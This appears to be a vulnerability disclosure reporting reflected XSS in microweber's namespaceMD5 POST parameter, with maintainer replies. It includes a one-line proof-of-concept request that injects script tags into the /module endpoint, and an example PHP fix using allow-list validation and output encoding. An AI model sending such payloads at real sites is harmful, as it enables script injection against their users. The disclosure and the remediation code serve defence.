Post parameter namespaceMD5 is vulnerable to reflected XSS in microweber/microweber
Reported on Nov 8th 2022
Description
The POST parameter namespaceMD5 is vulnerable to reflected XSS.
Proof of Concept
// POST request to /module with parameters and payload
namespaceMD5=3389dae361af79b04c9c8e7057f60cc6test}'')"><script>alert()</script><script>alert()</script>&module=settings%2Fgroup%2Flanguage_import&id=mw_admin_import_language_modal_content
Impact
JS injection.
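One way to close this kind of reflection, as an added example that is not microweber's code or its actual fix: allow-list the parameter before use and encode it on output. The helper names, and the assumption that namespaceMD5 carries a 32-character hex MD5 digest (suggested by its name and the prefix of the PoC value), are illustrative.

```php
<?php
declare(strict_types=1);

// Hypothetical helpers, not microweber's code.
// Assumption: namespaceMD5 should be a 32-character hex MD5 digest.
function parse_namespace_md5(mixed $raw): ?string
{
    if (!is_string($raw)) {
        return null; // missing value, or an array such as namespaceMD5[]=x
    }
    // \A and \z anchor the whole string; "$" would accept a trailing newline.
    return preg_match('/\A[a-f0-9]{32}\z/i', $raw) === 1 ? strtolower($raw) : null;
}

// Output encoding for HTML text and quoted attribute values.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Returns [HTTP status, body]. The rejected value is never echoed back.
function render_modal(array $post): array
{
    $ns = parse_namespace_md5($post['namespaceMD5'] ?? null);
    if ($ns === null) {
        return [400, '<p>Invalid namespace.</p>'];
    }
    return [200, '<input type="hidden" name="namespaceMD5" value="' . e($ns) . '">'];
}

// Constructed inputs: the value from the proof of concept and a well-formed digest.
$poc  = "3389dae361af79b04c9c8e7057f60cc6test}'')\"><script>alert()</script>";
$good = '3389dae361af79b04c9c8e7057f60cc6';

foreach (['poc' => $poc, 'good' => $good, 'array' => ['x']] as $label => $value) {
    [$status, $body] = render_modal(['namespaceMD5' => $value]);
    printf("%-5s -> %d %s\n", $label, $status, $body);
}

// Second layer: if the raw value did reach a template, encoding keeps it inert
// in HTML text and quoted-attribute contexts.
echo e($poc), "\n";
```

The page does not show the context in which the value is reflected. HTML encoding alone does not make a value safe inside inline JavaScript, so the allow-list check is the control that holds in every context.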
Occurrences
Hello
This error appears only when you have enabled the debug mode. Currently on the demo site the debug mode is enabled and that's why you see the error.
On user sites and on production sites, the debug mode is not enabled.
Oops, sorry, I replied to the wrong vulnerability, checking this now.